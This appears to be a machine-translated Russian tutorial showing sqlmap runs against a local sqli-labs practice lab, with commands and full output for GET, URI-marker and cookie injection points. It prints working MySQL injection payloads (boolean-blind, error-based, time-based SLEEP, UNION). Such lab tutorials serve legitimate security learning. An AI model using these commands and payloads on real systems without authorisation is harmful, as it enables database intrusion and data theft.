python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p "id,uname" --flush-session --banner
Распечатать
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:14:15 /2020-02-29/
[20:14:16] [INFO] testing connection to the target URL
[20:14:16] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:14:16] [INFO] testing if the target URL content is stable
[20:14:16] [INFO] target URL content is stable
[20:14:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[20:14:17] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[20:14:17] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:14:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:14:21] [WARNING] reflective value(s) found and filtering out
[20:14:21] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:14:21] [INFO] testing 'Generic inline queries'
[20:14:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:14:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:14:21] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:14:21] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:14:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:14:21] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:14:21] [INFO] testing 'MySQL inline queries'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:14:21] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:14:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:14:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:14:22] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:14:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:14:32] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:14:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:14:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:14:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:14:32] [INFO] target URL appears to have 3 columns in query
[20:14:32] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7433=7433 AND 'hrGB'='hrGB
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 8471 FROM(SELECT COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8471=8471,1))),0x716a766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ygzr'='Ygzr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6957 FROM (SELECT(SLEEP(5)))YTQj) AND 'ogBe'='ogBe
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5025' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7171,0x586f6f6965736173736f49534a4243526a6c4c625a59534d484c6d74426d6d414b7551676b734c56,0x716a766271)-- -
---
[20:14:36] [INFO] the back-end DBMS is MySQL
[20:14:36] [INFO] fetching banner
[20:14:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[20:14:36] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 20:14:36 /2020-02-29/
2. sqlmap устанавливает место для инъекции URI
Когда точка внедрения находится внутри самого URI, могут возникнуть некоторые особые ситуации. Если вы вручную не укажете путь URI, sqlmap не будет выполнять автоматическое тестирование для пути URI, и вы должны добавить его в командную строку.Звездочка (*) Чтобы указать эти точки впрыска.
для проверки:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1*&us=1&uname=admin --banner
Распечатать
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:31:12 /2020-02-29/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[20:31:14] [INFO] testing connection to the target URL
[20:31:14] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:31:14] [INFO] testing if the target URL content is stable
[20:31:15] [INFO] target URL content is stable
[20:31:15] [INFO] testing if URI parameter '#1*' is dynamic
[20:31:15] [INFO] URI parameter '#1*' appears to be dynamic
[20:31:15] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:31:15] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:31:15] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:31:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:31:17] [WARNING] reflective value(s) found and filtering out
[20:31:17] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:31:17] [INFO] testing 'Generic inline queries'
[20:31:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:31:17] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:31:17] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:31:17] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:31:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:31:17] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:31:17] [INFO] testing 'MySQL inline queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:31:17] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:31:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:31:17] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:31:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:31:27] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:31:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:31:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:31:27] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:31:27] [INFO] target URL appears to have 3 columns in query
[20:31:28] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 9722=9722 AND 'aMLa'='aMLa
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 4986 FROM(SELECT COUNT(*),CONCAT(0x716b787171,(SELECT (ELT(4986=4986,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ocPA'='ocPA
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))FboN) AND 'hyuA'='hyuA
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=-5390' UNION ALL SELECT NULL,CONCAT(0x716b787171,0x43554e745571626a51707163415541545a6246417749666442464676727449686b734f566966626b,0x7171767a71),NULL-- -
---
[20:31:33] [INFO] the back-end DBMS is MySQL
[20:31:34] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:31:34] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 20:31:34 /2020-02-29/
'us'Это не внутренняя или внешняя команда, ни исполняемая программа
Или командный файл.
uname: unknown option -- banner
Try 'uname --help' for more information.
Добавьте аннотацию параметра для повторного тестирования:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1*&us=1*&uname=admin --banner
Распечатать
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:33:23 /2020-02-29/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[20:33:26] [INFO] testing connection to the target URL
[20:33:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:33:26] [INFO] testing if the target URL content is stable
[20:33:26] [INFO] target URL content is stable
[20:33:26] [INFO] testing if URI parameter '#1*' is dynamic
[20:33:26] [INFO] URI parameter '#1*' appears to be dynamic
[20:33:26] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:33:26] [INFO] heuristic (XSS) test shows that URI parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:33:26] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:33:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:33:28] [WARNING] reflective value(s) found and filtering out
[20:33:28] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[20:33:28] [INFO] testing 'Generic inline queries'
[20:33:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:33:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:33:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:33:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:33:28] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:33:28] [INFO] testing 'MySQL inline queries'
[20:33:28] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:33:28] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:33:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:33:29] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:33:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:33:39] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:33:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:33:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:33:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:33:39] [INFO] target URL appears to have 3 columns in query
[20:33:39] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND 6632=6632 AND 'YYeb'='YYeb
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 4244 FROM(SELECT COUNT(*),CONCAT(0x7176786271,(SELECT (ELT(4244=4244,1))),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mGsy'='mGsy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=1' AND (SELECT 1332 FROM (SELECT(SLEEP(5)))sgvg) AND 'BhGb'='BhGb
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: http://127.0.0.1:80/sqli-labs/Less-1/?id=-9618' UNION ALL SELECT NULL,NULL,CONCAT(0x7176786271,0x586f6d53686f797063544e70586866436d4b68544670504a415a674f675176744174494f7364754e,0x7178786271)-- -
---
[20:33:55] [INFO] the back-end DBMS is MySQL
[20:33:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[20:33:56] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 20:33:56 /2020-02-29/
'us'Это не внутренняя или внешняя команда, ни исполняемая программа
Или командный файл.
uname: unknown option -- banner
Try 'uname --help' for more information.
По умолчанию параметры в URI не проверяются, плюс* После маркировки он будет проверен.
Добавьте файл cookie для повторного тестирования:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-20/?id=1 --cookie="uname=admin*" --banner
Распечатать
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:37:34 /2020-02-29/
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q]
[20:37:36] [INFO] testing connection to the target URL
[20:37:36] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:37:36] [INFO] testing if the target URL content is stable
[20:37:36] [INFO] target URL content is stable
[20:37:36] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n]
[20:37:37] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be dynamic
[20:37:37] [INFO] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might be injectable (possible DBMS: 'MySQL')
[20:37:37] [INFO] heuristic (XSS) test shows that (custom) HEADER parameter 'Cookie #1*' might be vulnerable to cross-site scripting (XSS) attacks
[20:37:37] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[20:37:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:37:39] [WARNING] reflective value(s) found and filtering out
[20:37:39] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Login")
[20:37:39] [INFO] testing 'Generic inline queries'
[20:37:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:37:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:37:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:37:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:37:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:37:40] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[20:37:40] [INFO] testing 'MySQL inline queries'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:37:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:37:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:37:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:37:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:37:50] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[20:37:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:37:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:37:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:37:50] [INFO] target URL appears to have 3 columns in query
[20:37:50] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[20:38:00] [INFO] testing if GET parameter 'id' is dynamic
[20:38:01] [WARNING] GET parameter 'id' does not appear to be dynamic
[20:38:01] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:38:01] [INFO] testing for SQL injection on GET parameter 'id'
[20:38:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:01] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:38:01] [INFO] testing 'Generic inline queries'
[20:38:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:38:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:38:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[20:38:05] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:38:06] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:38:08] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[20:38:10] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:38:11] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[20:38:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:38:16] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[20:38:17] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:38:17] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[20:38:17] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:38:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[20:38:18] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[20:38:18] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[20:38:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[20:38:20] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[20:38:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[20:38:22] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[20:38:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[20:38:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:27] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:38:30] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:38:31] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[20:38:32] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[20:38:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[20:38:34] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[20:38:35] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[20:38:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:38:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:38:35] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[20:38:35] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[20:38:35] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[20:38:35] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[20:38:36] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[20:38:36] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL inline queries'
[20:38:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[20:38:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[20:38:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[20:38:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[20:38:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[20:38:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:38:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:38:42] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[20:38:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[20:38:44] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[20:38:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[20:38:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[20:38:46] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[20:38:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[20:38:47] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:38:50] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[20:38:51] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[20:38:51] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
